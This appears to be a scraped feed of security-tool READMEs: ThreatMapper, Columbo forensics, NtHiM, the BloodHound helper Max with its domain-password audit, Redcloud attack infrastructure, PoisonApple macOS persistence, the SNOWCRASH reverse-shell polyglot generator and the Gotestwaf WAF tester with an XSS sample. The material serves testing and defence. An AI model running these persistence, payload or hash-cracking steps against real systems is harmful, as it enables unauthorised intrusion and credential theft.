FeaturesRuntime Threat mapper (Community Edition)Workload Protection Platform (Enterprise Edition)
Discover & Visualize Running Pods, Containers and Hosts
✔️
(unlimited)
✔️
(unlimited)
Runtime Vulnerability Management for hosts/VMs
✔️
(unlimited)
✔️
(unlimited)
Runtime Vulnerability Management for containers
✔️
(unlimited)
✔️
(unlimited)
Container Registry Scanning
✔️
✔️
CI/CD Integration
✔️
✔️
Multiple Clusters
✔️
✔️
Integrations with SIEMs, Slack and more
✔️
✔️
Compliance Automation
✔️
Deep Packet Inspection of Encrypted & Plain Traffic
✔️
API Inspection
✔️
Runtime Integrity Monitoring
✔️
Network Connection & Resource Access Anomaly Detection
✔️
Workload Firewall for Containers, Pods and Hosts
✔️
Quarantine & Network Protection Policies
✔️
Alert Correlation
✔️
Serverless Protection
✔️
Windows Protection
✔️
Highly Available & Multi-node Deployment
✔️
Multi-tenancy & User Management
✔️
Enterprise Support
✔️

Getting Started

The Deepfence Management Console is first installed on a separate system. The Deepfence agents are then installed onto bare-metal servers, Virtual Machines, or Kubernetes clusters where the application workloads are deployed, so that the host systems, or the application workloads, can be scanned for vulnerabilities.

A pictorial depiction of the Deepfence security platform is as follows:



Deepfence Management Console

Pre-Requisites for Management Console
FeatureRequirements
CPU: No of cores4
RAM16 GB
Disk spaceAt-least 120 GB
Port range to be opened for receiving data from Deepfence agents8000 - 8010
Port to be opened for web browsers to be able to communicate with the Management console to view the UI443
Docker binariesAt-least version 18.03
Docker-compose binaryVersion 1.20.1

Following table gives the number of nodes that can be supported with different console machine configurations assuming a single node deployment of console. Memory optimised instances are shown to perform better.

CPURAMNodes supported
4 cores16 GB RAM250 nodes
8 cores16 GB RAM500 nodes
8 cores32 GB RAM1000 nodes
16 cores32 GB RAM1400-1500 nodes

In order to support higher numbers of nodes (i.e. hosts as number of containers can be unlimited theoretically based on their life times) ThreatMapper needs to be deployed as a 3 node k8s cluster to scale up to 10000 nodes, instructions to follow.


Installation of Deepfence Management Console

Installing the Management Console is as easy as:

  1. Download the file docker-compose.yml to the desired system.
  2. Execute the following command
    docker-compose -f docker-compose.yml up -d
  3. Open management console ip address / domain in the browser (https://x.x.x.x) and register a new account. Steps: Register a User
  4. Get Deepfence api key from UI: Goto Settings -> User Management, copy api key. In the following docker run command, replace C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with api Key. Steps: Deepfence API Key
    docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /sys/kernel/debug:/sys/kernel/debug:rw -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -e USER_DEFINED_TAGS="" -e DF_BACKEND_IP="127.0.0.1" -e DEEPFENCE_KEY="C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0" deepfenceio/deepfence_agent_ce:latest

This is the minimal installation required to quickly get started on scanning various container images. The necessary images may now be downloaded onto this Management Console and scanned for vulnerabilities.


Terraform

Installation with custom TLS certificates

Custom TLS certificates are supported for the web application hosted on the console machine. On the console machine users have to place the certificate and private key on /etc/deepfence/certs folder. Deepfence looks for the file with .key and .crt extentions on the specified location on the host.


Deepfence Agent

In order to check a host for vulnerabilities, or if docker images or containers that have to be checked for vulnerabilities are saved on different hosts, then the Deepfence agent needs to be installed on those hosts.


Pre-Requisites for Deepfence Agent
FeatureRequirements
CPU: No of cores2
RAM1 GB
Disk spaceAt-least 30 GB
ConnectivityThe host on which the Deepfence Agent is to be installed, is able to communicate with the Management Console on port range 8000-8010.
Linux kernel version>= 4.4
Docker binariesAt-least version 18.03
Deepfence Management ConsoleInstalled on a host with IP Address x.x.x.x

Installation of Deepfence Agent

Installation procedure for the Deepfence agent depends on the environment that is being used. Instructions for installing Deepfence agent on some of the common platforms are given in detail below:


Deepfence Agent on Standalone VM or Host

Installing the Deepfence Agent is now as easy as:

  1. Get Deepfence api key from UI: Goto Settings -> User Management, copy api key
  2. In the following docker run command, replace x.x.x.x with the IP address of the Management Console and replace C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with api Key
    docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /sys/kernel/debug:/sys/kernel/debug:rw -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -e USER_DEFINED_TAGS="" -e DF_BACKEND_IP="x.x.x.x" -e DEEPFENCE_KEY="C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0" deepfenceio/deepfence_agent_ce:latest
  3. Optionally the agent node can be tagged using USER_DEFINED_TAGS="" in the above command. Tags should be comma separated. Example: "dev,front-end"

Deepfence Agent on Amazon ECS

For detailed instructions to deploy agents on Amazon ECS, please refer to our Amazon ECS wiki page.


Deepfence Agent Helm chart for Kubernetes
  • Start deepfence agent (replace x.x.x.x with the IP address of the Management Console and C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0 with api key)
# helm v2
helm install --repo https://deepfence.github.io/ThreatMapper/files/helm-chart deepfence-agent \
--name=deepfence-agent \
--set managementConsoleIp=x.x.x.x \
--set deepfenceKey=C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0
# helm v3
helm install deepfence-agent --repo https://deepfence.github.io/ThreatMapper/files/helm-chart deepfence-agent \
--set managementConsoleIp=x.x.x.x \
--set deepfenceKey=C8TtyEtNB0gBo1wGhpeAZICNSAaGWw71BSdS2kLELY0
  • Delete deepfence agent
# helm v2
helm delete --purge deepfence-agent
# helm v3
helm delete deepfence-agent

Deepfence Agent on Google GKE

For detailed instructions to deploy agents on Google GKE, please refer to our Google GKE wiki page.


Deepfence Agent on Azure AKS

For detailed instructions to deploy agents on Azure Kubernetes Service, please refer to our Azure AKS wiki page.


Deepfence Agent on self-managed / on-premise Kubernetes

For detailed instructions to deploy agents on a Kubernetes cluster, please refer to our Self-managed/On-premise Kubernetes wiki page.



Columbo - A Computer Forensic Analysis Tool Used To Simplify And Identify Specific Patterns In Compromised Datasets

$
0
0


Columbo is a computer forensic analysis tool used to simplify and identify specific patterns in compromised datasets. It breaks down data to small sections and uses pattern recognition and machine learning models to identify adversaries behaviour and their possible locations in compromised Windows platforms in a form of suggestions. Currently Columbo operates on Windows platform.


Dependencies & High Level Architecture

Columbo depends on volatility 3, autorunsc.exe and sigcheck.exe to extract data. Therefore users must download these dependent tools and place them under \Columbo\bin folder. Please Make sure you Read and Understand the license section (or License.txt file) before you download anything. The output (data) generated by these tools are automatically piped to Columbo's main engine. It breaks it down to small sections, pre-process it and applies machine learning models to classify the location of the compromised system, executable files and other behaviours.


Get started with Columbo

Videos

  1. Before you start Columbo Watch
  2. Memory forensics using Columbo Memory-forensics

Installation and Configuration

Executable -Binary

  1. Download and install python 3.7 or 3.8 (not tested with 3.9). Make sure you add python.exe to the PATH during the installation.
  2. Download latest binary Columbo release, under Releases
  3. Download each of the following and place them under \Columbo\bin.
  • Volatility 3 source code. Columbo does not support Volatility 2. Please make sure you also download Symbol table packs for windows, unzip it and put it under \Columbo\bin\volatility3-master\volatility\symbols.
  • Download both autorunsc.exe and sigcheck.exe

NB: To avoid errors, The directory structure must be like \Columbo\bin\volatility3-master , \Columbo\bin\autorunsc.exe and \Columbo\bin\sigcheck.exe

Finally double click on "main.exe" under \Columbo.

Source Code

  1. Download and install python 3.7 or 3.8 (not tested with 3.9). Make sure you add python.exe to the PATH during the installation.
  2. Download the latest release version of Columbo - source code.
  3. Double click on install-prerequisites.bat to install all the required packages.
  4. Download each of the following and place them unde \Columbo\bin.
  • Volatility 3 source code. Columbo does not support Volatility 2. Please make sure you also download Symbol table packs for windows, unzip it and put it under \Columbo\bin\volatility3-master\volatility\symbols
  • Download both autorunsc.exe and sigcheck.exe.

NB: To avoid errors, The directory structure must be like this \Columbo\bin\volatility3-master , \Columbo\bin\autorunsc.exe and \Columbo\bin\sigcheck.exe

Finally go to cmd and issue python.exe \Columbo\main.py


Columbo and Machine Learning

Columbo uses data preprocessing to organise the data and machine learning models to identify suspicious behaviours. Its outputs are either 1 (suspicious) or 0 (genuine) -in a form of suggestions purely to assist digital forensic examiners in their decision making. We have trained the models with different examples to maximise accuracy and used different approaches to minimise false positives. However,  false positives (false detection)  are still experienced and therefore we are committed to update the models  periodically.   


False Positive

It's not easy to reduce false positives (false detection), especially when we deal with machine learning. The output generated by machine learning models might be false positive depending on the quality of the data used to train the models. However, to assist forensic examiners in their investigation, Columbo generates percentage scores for each 1 (suspicious) and 0 (genuine). Such approach helps the examiners to pick and choose the path, command or processes that Columbo classifies them as suspicious.


Options to Select

Option 2

Live analysis -files and process traceability. This option analyses running Windows processes to identify running malicious activities if any. Columbo uses autorunsc.exe to extract the data from the machine, the outputs are piped to Machine Learning models and pattern recognition engines to classify suspicious activities. Later the outputs are saved under \Columbo\ML\Step-2-results in a form of excel files for further analysis. Furthermore, users are given options to examine running processes. The result contains information such as process traceability, commands that are associated with each process -if applicable and whether or not, the processes are responsible for executing new processes.

Option 3

Scan and analyse Hard Disk Image File (.vhdx): This option takes paths of mounted Hard Disk Image of Windows. It uses sigcheck.exe to extract the data from the file systems. Then the results are piped into Machine Learning models to classify suspicious activities. Further the outputs are saved under \Columbo\ML\Step-3-results in a form of excel files.

Option 4

Memory Forensics. In this option, Columbo takes the path of the memory image and following options are produced for users to select.

  1. Memory Information: Volatility 3 is used to extract information about the image.

  2. Processes Scan: Volatility 3 is used to extract process, dll and handle information of each process. Then, Columbo uses grouping and clustering mechanisms to group each process according to their mother processes. This option is later used by the process traceability under Anomaly Detection option.

  3. process Tree: Volatility 3 is used to extract process tree of the processes.

  4. Anomaly Detection and Process Traceability: Volatility 3 is used to extract a list of Anomaly Detection processes. However, Columbo gives an option called Process Traceability to separately examine each process and collectively produces the following information.

  • Paths of the executable files and associated commands.
  • Using Machine Learning models to determine the legitimacy of the identified processes.
  • Trace each process all the way back to their root processes (complete path) and their execution dates and time.
  • Identify if the process is responsible for executing other processes i.e. is it going to be a mother process of new processes or not.
  • It extracts, handles and dlls information of  each process and presents them with the rest of the information. 


    NtHiM - Super Fast Sub-domain Takeover Detection

    $
    0
    0


    NtHiM - Super Fast Sub-domain Takeover Detection


    Installation

    Method 1: Using Pre-compiled Binaries

    The pre-compiled binaries for different systems are available in the Releases page. You can download the one suitable for your system, unzip the file and start using NtHiM.


    Method 2: Using Crates.io

    NtHiM is available on Crates.io. So, if you have Rust installed on your system, you can simply install NtHiM with the following command:

    cargo install NtHiM

    Method 3: Manual Build

    You will need Cargo to perform the manual build for NtHiM. If you have Cargo installed, you can simply follow the steps below:

    1. Clone this repository, git clone https://github.com/TheBinitGhimire/NtHiM;
    2. Go inside the folder, cd NtHiM;
    3. Use the cargo build command,
    4. Go inside the newly-created target folder, and open the debug folder inside it, cd target/debug;
    5. You will find NtHiM.exe (on Microsoft Windows) or NtHiMbinary (on Linux).

    The installation walkthrough for NtHiM has been uploaded to YouTube, covering all of these three methods, and you can watch the video here: How to Install and Use NtHiM (Now, the Host is Mine!)? Super Fast Sub-domain Takeover Detection!


    Usage
    FlagDescriptionExample
    -hDisplay help related to usage!NtHiM -h
    -tScan a single target!NtHiM -t https://example.example.com
    -fScan a list of targets from a file!NtHiM -f hostnames.txt
    -cNumber of Concurrent Threads!NtHiM -c 100 -f hostnames.txt
    -VDisplay the version information!NtHiM -V

    Use Case 1 (Single Target):
    NtHiM -t https://example.example.com

    Use Case 2 (Multiple Targets):
    NtHiM -f hostnames.txt

    Usage Demonstration:



    Examples

    Single Target



    Multiple Targets using Concurrent Threads



    Workflow

    Platform Identification

    NtHiM uses the data provided in EdOverflow/can-i-take-over-xyz for the platform identification.


    Frequently Asked Questions (FAQs)

    If you have any questions regarding NtHiM, please raise an issue by going to the Issues page.

    Some of your queries might have been answered in one of the existing issues, so please make sure to check the Issues with the FAQ label before raising an issue on your own.


    Contributions and Feature Requests

    If you are interested in contributing in the development of NtHiM, you can feel free to create a Pull Request with modifications in the original code, or you shall open up a new issue, and I will try to include the feature as requested.

    There is no restriction on anyone for contributing to the development of NtHiM. If you would like to contribute, you can feel free to do so.



    Max - Maximizing BloodHound

    $
    0
    0


    Maximizing BloodHound.

    Description

    New Release:

    • dpat - The BloodHound Domain Password Audit Tool (DPAT)

    A simple suite of tools:

    • get-info - Pull lists of information from the Neo4j database
    • mark-owned - Mark a list of objects as Owned
    • mark-hvt - Mark a list of objects as High Value Targets
    • query - Run a raw Cypher query and return output
    • export - Export all outbound controlling privileges of a domain object to a CSV file
    • del-edge - Delete an edge from the database
    • add-spns - Create HasSPNConfigured relationships, new attack primitive
    • add-spw - Create SharesPasswordWith relationships
    • dpat - The BloodHound Domain Password Audit Tool (DPAT)
    • pet-max - Dogsay, happiness for stressful engagements

    This was released with screenshots & use-cases on the following blogs: Max Release, Updates & Primitives& DPAT

    A new potential attack primitive was added to this tool during my research, see the add-spns section for full details.


    Usage

    Installation

    Ideally there shouldn't be much to install, but I've included a requirements.txt file just in case. Tested on Kali Linux& Windows 10, all functionality should work for both linux and Windows operating systems.

    pip3 install -r requirements.txt


    Neo4j Creds

    Neo4j credentials can be hardcoded at the beginning of the script OR they can be provided as CLI. If both areas are left blank, you will be prompted for the uname/password.

    python3 max.py -u neo4j -p neo4j {module} {args}
    python3 max.py {module} {args}
    Neo4j Username: neo4j
    Neo4j Password:

    Quick Use

    Getting help in general, and module specific

    python3 max.py -h
    python3 max.py {module} -h

    Importing owned objects into BH

    python3 max.py mark-owned -f owned.txt
    python3 max.py mark-owned -f owned.txt --add-note "Owned by repeated local admin"

    Get list of users

    python3 max.py get-info --users
    python3 max.py get-info --users --enabled

    USER01@DOMAIN.LOCAL
    USER02@DOMAIN.LOCAL
    ...

    Get list of objects in a target group

    python3 max.py get-info --group-members "domain controllers@domain.local"

    Get a list of computers that a user has administrative rights to

    python3 max.py get-info --adminto USER01@DOMAIN.LOCAL

    Get a list of owned objects with the notes for each

    python3 max.py get-info --owned --get-note

    Running a query - return a list of all users with a path to DA

    python3 max.py query -q "MATCH (n:User),(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'}) MATCH (n)-[*1..]->(m) RETURN DISTINCT(n.name)"

    Delete an edge from the database

    python3 max.py del-edge CanRDP

    Add HasSPNConfigured relationship using the information stored within BloodHound, or with a GetUserSPNs impacket file

    python3 max.py add-spns -b
    python3 max.py add-spns -i getuserspns-raw-output.txt

    DPAT

    python3 max.py dpat -n ~/client/ntds.dit -p ~/.hashcat/hashcat.potfile -o ouputdir --html --sanitize

    Pet max

    python3 max.py pet-max

    Object Files & Specification

    Objects in file, must contain FQDN within, capitalization does not matter. This also applies to whenever a CLI username/computer name is supplied.

    user01@domain.local      <- will be added / correct CLI input
    group01@domain.local <- will be added / correct CLI input
    computer01.domain.local <- will be added / correct CLI input
    ComPutEr01.doMAIn.LOcaL <- will be added / correct CLI input
    user02 <- will not be added / incorrect CLI input
    computer02 <- will not be added / incorrect CLI input

    Further work

    I hope to include an analyze function to provide some sort functionality similar to PlumHound/Cypheroth. Lastly, thinking about creating a Powershell version for those running Neo4j on Windows, but I'm trash at Powershell so TBD.

    Any other features and improvements welcome, find me @knavesec in the BloodHoundGang Slack channel and on Twitter


    Contributors

    I'd like to especially thank those who have contributed their time to developing & improving this tool:



    Redcloud - Automated Red Team Infrastructure Deployement Using Docker

    $
    0
    0


    Redcloud is a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker. Harness the cloud's speed for your tools. Deploys in minutes. Use and manage it with its polished web interface.

    Ideal for your penetration tests, shooting ranges, red teaming and bug bounties!

    Self-host your attack infrastructure painlessly, deploy your very own live, scalable and resilient offensive infrastructure in a matter of minutes.


    Demo


    The following demo showcases deployment of Redcloud through ssh, followed by Metasploit. We then look at Traefik and a live volume attached to Metasploit. Finally, we check that Metasploit's DB is functional with the web terminal, delete the container, and terminate Redcloud.


    Features
    • Deploy Redcloud locally or remotely using the built-in SSH functions, and even docker-machine.
    • Deploy Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more with a few clicks.
    • Monitor and manage your infrastructure with a beautiful web interface.
    • Deploy redirections, socks or Tor proxy for all your tools.
    • Painless network management and volume sharing.
    • User and password management.
    • Web terminal
    • Overall very comfy

    Quick Start

    Setup:

    # If deploying using ssh
    > cat ~/.ssh/id_rsa.pub | ssh root@your-deploy-target-ip 'cat >> .ssh/authorized_keys'

    # If deploying using docker-machine, and using a machine named "default"
    > eval (docker-machine env default)

    # Check your Python version
    # Use python3 if default python version is 2.x
    > python --version

    Deploy:

    > git clone https://github.com/khast3x/redcloud.git
    > cd redcloud
    > python redcloud.py

    Redcloud uses PyYAML to print the list of available templates. It's installed by default on most systems.
    If not, simply run:

    # Use pip3 if default python version is 2.x
    > pip install -r requirements.txt

    Redcloud has 3 different deployment methods:

    1. Locally
    2. Remotely, using ssh. Requires having your public key in your target's authorized_keys file.
    3. Remotely, using docker-machine. Run the eval (docker-machine env deploy_target) line to preload your env with your docker-machine, and run redcloud.py. Redcloud should automatically detect your docker-machine, and highlight menu items relevant to a docker-machine deployment.

    Templates


    Briefly,

    redcloud.py deploys a Portainer stack, preloaded with many tool templates for your offensive engagements, powered by Docker. Once deployed, control Redcloud with the web interface. Uses Traefik as reverse-proxy. Easy remote deploy to your target server using the system ssh or docker-machine.

    • Ever wanted to spin up a Kali in a cloud with just a few clicks?
    • Have clean silos between your tools, technics and stages?
    • Monitor the health of your scans and C2?
    • Skip those sysadmin tasks for setting up a phishing campaign and get pwning faster?
    • Curious how you would build the ideal attack infrastructure?

    Use the web UI to monitor, manage, and interact with each container. Use the snappy web terminal just as you would with yours. Create volumes, networks and port forwards using Portainer's simple UI.

    Deploy and handle all your favorite tools and technics with the power of data-center-grade internet


    Screenshots
    • Deploying a container

     

    • Using Metasploit's msfconsole through the web interface

     

    • Traefik real-time data on reverse-proxy routes


    • Deploying using ssh




    PoisonApple - macOS Persistence Tool

    $
    0
    0


    Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by threat hunters for cyber threat emulation purposes.


    Install

    Do it up:

    $ pip3 install poisonapple --user

    Note: PoisonApple was written & tested using Python 3.9, it should work using Python 3.6+


    Important Notes!
    • PoisonApple will make modifications to your macOS system, it's advised to only use PoisonApple on a virtual machine. Although any persistence mechanism technique added using this tool can also be easily removed (-r), please use with caution!
    • Be advised: This tool will likely cause common AV / EDR / other macOS security products to generate alerts.
    • To understand how any of these techniques work in-depth please see The Art of Mac Malware, Volume 1: Analysis - Chapter 0x2: Persistence by Patrick Wardle of Objective-See. It's a fantastic resource.

    Usage

    See PoisonApple switch options (--help):

    $ poisonapple --help
    usage: poisonapple [-h] [-l] [-t TECHNIQUE] [-n NAME] [-c COMMAND] [-r]

    Command-line tool to perform various persistence mechanism techniques on macOS.

    optional arguments:
    -h, --help show this help message and exit
    -l, --list list available persistence mechanism techniques
    -t TECHNIQUE, --technique TECHNIQUE
    persistence mechanism technique to use
    -n NAME, --name NAME name for the file or label used for persistence
    -c COMMAND, --command COMMAND
    command(s) to execute for persistence
    -r, --remove remove persistence mechanism

    List of available techniques:

    $ poisonapple --list
    , _______ __
    .-.:|.-. | _ .-----|__|-----.-----.-----.
    .' '. |. | | | | |__ --| | | | |
    '-."~". .-' |. ____|_____|__|_____|_____|__|__|
    } ` } { |: | _______ __
    } } } { |::.| | _ .-----.-----| |-----.
    } ` } { `---' |. | | | | | | | -__|
    .-'"~" '-. |. _ | __| __|__|_____|
    '. .' |: | |__| |__|
    '-_.._-' |::.|:. |
    `--- ---' v0.2.0

    +--------------------+
    | AtJob |
    +--------------------+
    | Bashrc |
    +--------------------+
    | Cron |
    +--------------------+
    | CronRoot |
    +--------------------+
    | Emond |
    +--------------------+
    | LaunchAgent |
    +--------------------+
    | LaunchAgentUser |
    +--------------------+
    | LaunchDaemon |
    +--- -----------------+
    | LoginHook |
    +--------------------+
    | LoginHookUser |
    +--------------------+
    | LoginItem |
    +--------------------+
    | LogoutHook |
    +--------------------+
    | LogoutHookUser |
    +--------------------+
    | Periodic |
    +--------------------+
    | Reopen |
    +--------------------+
    | Zshrc |
    +--------------------+

    Apply a persistence mechanism:

    $ poisonapple -t LaunchAgentUser -n testing
    , _______ __
    .-.:|.-. | _ .-----|__|-----.-----.-----.
    .' '. |. | | | | |__ --| | | | |
    '-."~". .-' |. ____|_____|__|_____|_____|__|__|
    } ` } { |: | _______ __
    } } } { |::.| | _ .-----.-----| |-----.
    } ` } { `---' |. | | | | | | | -__|
    .-'"~" '-. |. _ | __| __|__|_____|
    '. .' |: | |__| |__|
    '-_.._-' |::.|:. |
    `--- ---' v0.2.0

    [+] Success! The persistence mechanism action was successful: LaunchAgentUser

    If no command is specified (-c) a default trigger command will be used which writes to a file on the Desktop every time the persistence mechanism is triggered:

    $ cat ~/Desktop/PoisonApple-LaunchAgentUser
    Triggered @ Tue Mar 23 17:46:02 CDT 2021
    Triggered @ Tue Mar 23 17:46:13 CDT 2021
    Triggered @ Tue Mar 23 17:46:23 CDT 2021
    Triggered @ Tue Mar 23 17:46:33 CDT 2021
    Triggered @ Tue Mar 23 17:46:43 CDT 2021
    Triggered @ Tue Mar 23 17:46:53 CDT 2021
    Triggered @ Tue Mar 23 17:47:03 CDT 2021
    Triggered @ Tue Mar 23 17:47:13 CDT 2021
    Triggered @ Tue Mar 23 17:48:05 CDT 2021
    Triggered @ Tue Mar 23 17:48:15 CDT 2021

    Remove a persistence mechanism:

    $ poisonapple -t LaunchAgentUser -n testing -r
    ...

    Use a custom command:

    $ poisonapple -t LaunchAgentUser -n foo -c "echo foo >> /Users/user/Desktop/foo"
    ...


    SNOWCRASH - A Polyglot Payload Generator

    $
    0
    0

    SNOWCRASH creates a script that can be launched on both Linux and Windows machines. Payload selected by the user (in this case combined Bash and Powershell code) is embedded into a single polyglot template, which is platform-agnostic.

    There are few payloads available, including command execution, reverse shell establishment, binary execution and some more :>


    Basic usage
    1. Install dependencies: ./install.sh

    2. List available payloads: ./snowcrash --list

    3. Generate chosen payload: ./snowcrash --payload memexec --out polyglot_script

    4. Change extension of the polyglot script: mv polyglot_script polyglot_script.ps1

    5. Execute polyglot script on the target machine


    Additional notes

    Delay before script run and payload execution can be specified as an interval (using --sleep flag) in the form:

    x[s|m|h]

    where

    x = Amount of interval to spend in idle state
    s = Seconds
    m = Sinutes
    h = Hours

    After generation, the extension of generated script containing the payload can be set either to .sh or .ps1 (depending on the platform we want to target).

    Generated payload can be written directly to STDOUT (instead of writing to a file) using --stdout flag.


    Screenshots





    Gotestwaf - Go Test WAF Is A Tool To Test Your WAF Detection Capabilities Against Different Types Of Attacks And By-Pass Techniques

    $
    0
    0


    An open-source Go project to test different web application firewalls (WAF) for detection logic and bypasses.


    How it works

    It is a 3-steps requests generation process that multiply amount of payloads to encoders and placeholders. Let's say you defined 2 payloads, 3 encoders (Base64, JSON, and URLencode) and 1 placeholder (HTTP GET variable). In this case, the tool will send 2x3x1 = 6 requests in a testcase.


    Payload

    The payload string you wanna send. Like <script>alert(111)</script> or something more sophisticated. There is no macroses like so far, but it's in our TODO list. Since it's a YAML string, use binary encoding if you wanna to https://yaml.org/type/binary.html


    Encoder

    Data encoder the tool should apply to the payload. Base64, JSON unicode (\u0027 instead of '), etc.


    Placeholder

    A place inside HTTP request where encoded payload should be. Like URL parameter, URI, POST form parameter, or JSON POST body.


    Quick start

    Dockerhub

    The latest gotestwaf always available via the dockerhub repository: https://hub.docker.com/r/wallarm/gotestwaf
    It can be easily pulled via the following command:

    docker pull wallarm/gotestwaf

    Local Docker build
    docker build . --force-rm -t gotestwaf
    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports gotestwaf --url=https://the-waf-you-wanna-test/

    Find the report file waf-test-report-<date>.pdf in the reports folder that you mapped to /go/src/gotestwaf/reports inside the container.


    Build

    Gotestwaf supports all the popular platforms (Linux, Windows, macOS), and can be built natively if Go is installed in the system.

    go build -mod vendor

    Examples

    Testing on OWASP ModSecurity Core Rule Set

    Build & run ModSecurity CRS docker image

    You can pull, build and run ModSecurity CRS docker image automatically:

    make modsec

    Or manually with your configuration flags to test:

    docker pull owasp/modsecurity-crs
    docker run -p 8080:80 -d -e PARANOIA=1 --rm owasp/modsecurity-crs

    You may choose the PARANOIA level to increase the level of security.
    Learn more https://coreruleset.org/faq/


    Run gotestwaf

    If you want to test the functionality on the running ModSecurity CRS docker container, you can use the following commands:

    make scan_local               (to run natively)
    make scan_local_from_docker (to run from docker)

    Or manually from docker:

    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports --network="host" gotestwaf --url=http://127.0.0.1:8080/ --verbose

    And manually with go run (natively):

    go run ./cmd --url=http://127.0.0.1:8080/ --verbose

    Run gotestwaf with WebSocket check

    You can additionally set the WebSocket URL to check via the wsURL flag and verbose flag to include more information about the checking process:

    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports gotestwaf --url=http://172.17.0.1:8080/ --wsURL=ws://172.17.0.1:8080/api/ws --verbose

    Check results
    GOTESTWAF : 2021/03/03 15:15:48.072331 main.go:61: Test cases loading started
    GOTESTWAF : 2021/03/03 15:15:48.077093 main.go:68: Test cases loading finished
    GOTESTWAF : 2021/03/03 15:15:48.077123 main.go:74: Scanned URL: http://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.083134 main.go:85: WAF pre-check: OK. Blocking status code: 403
    GOTESTWAF : 2021/03/03 15:15:48.083179 main.go:97: WebSocket pre-check. URL to check: ws://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.251824 main.go:101: WebSocket pre-check: connection is not available, reason: websocket: bad handshake
    GOTESTWAF : 2021/03/03 15:15:48.252047 main.go:129: Scanning http://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.252076 scanner.go:124: Scanning started
    GOTESTWAF : 2021/03/03 15:15:51.210216 scanner.go:129: Scanning Time: 2.958076338s
    GOTESTWAF : 2021/03/03 15:15:51.210235 scanner.go:160: Scanning finished

    Negative Tests:
    +-----------------------+-- ---------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | TEST SET | TEST CASE | PERCENTAGE, % | BLOCKED | BYPASSED | UNRESOLVED |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | community | community-lfi | 66.67 | 4 | 2 | 0 |
    | community | community-rce | 14.29 | 6 | 36 | 0 |
    | community | community-sqli | 70.83 | 34 | 14 | 0 |
    | community | community-xss | 91.78 | 279 | 25 | 0 |
    | community | community-xxe | 100.00 | 4 | 0 | 0 |
    | owasp | ldap-injection | 0.00 | 0 | 8 | 0 |
    | owasp | mail-injection | 0.00 | 0 | 6 | 6 |
    | owasp | nosql-injection | 0.00 | 0 | 12 | 6 |
    | owasp | path-traversal | 38.89 | 7 | 11 | 6 |
    | owasp | shell-injection | 37.50 | 3 | 5 | 0 |
    | owasp | sql-injection | 33.33 | 8 | 16 | 8 |
    | owasp | ss-include | 50.00 | 5 | 5 | 10 |
    | owasp | sst-injection | 45.45 | 5 | 6 | 9 |
    | owasp | xml-injection | 100.00 | 12 | 0 | 0 |
    | owasp | xss-scripting | 56.25 | 9 | 7 | 12 |
    | owasp-api | graphql | 100.00 | 1 | 0 | 0 |
    | owasp-api | rest | 100.00 | 2 | 0 | 0 |
    | owasp-api | soap | 100.00 | 2 | 0 | 0 |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | DATE: | WAF NAME: | WAF AVERAGE SCORE: | BLOCKED (RESOLVED): | BYPASSED (RESOLVED): | UNRESOLVED: |
    | 2021-03-03 | GENERIC | 55.83% | 381/534 (71.35%) | 153/534 (28.65%) | 57/591 (9.64%) |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+

    Positive Tests:
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | TEST SET | TEST CASE | PERCENTAGE, % | BLOCKED | BYPASSED | UNRESOLVED |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | false-pos | texts | 50.00 | 1 | 1 | 6 |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | DATE: | WAF NAME: | WAF POSITIVE SCORE: | FALSE POSITIVE (RES): | TRUE POSITIVE (RES): | UNRESOLVED: |
    | 2021-03-03 | GENERIC | 50.00% | 1/2 (50.00%) | 1/2 (50.00%) | 6/8 (75.00%) |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+

    PDF report is ready: reports/waf -evaluation-report-generic-2021-March-03-15-15-51.pdf


    Configuration options
    Usage of /go/src/gotestwaf/gotestwaf:
    --blockRegex string Regex to detect a blocking page with the same HTTP response status code as a not blocked request
    --blockStatusCode int HTTP status code that WAF uses while blocking requests (default 403)
    --configPath string Path to the config file (default "config.yaml")
    --followCookies If true, use cookies sent by the server. May work only with --maxIdleConns=1
    --idleConnTimeout int The maximum amount of time a keep-alive connection will live (default 2)
    --maxIdleConns int The maximum number of keep-alive connections (default 2)
    --maxRedirects int The maximum number of handling redirects (default 50)
    --nonBlockedAsPassed If true, count requests that weren't blocked as passed. If false, requests that don't satisfy to PassStatuscode/PassRegExp as blocked
    --passRegex string Regex to a detect normal (not blocked) web page with the same HTTP status code as a blocked request
    --passStatusCode int HTTP response status code that WAF uses while passing requests (default 200)
    --proxy string Proxy URL to use
    --randomDelay int Random delay in ms in addition to the delay between requests (default 400)
    --reportPath string A directory to store reports (default "reports")
    --sendDelay int Delay in ms between requests (default 400)
    --testCase string If set then only this test case will be run
    --testCasesPath string Path to a folder with test cases (default "testcases")
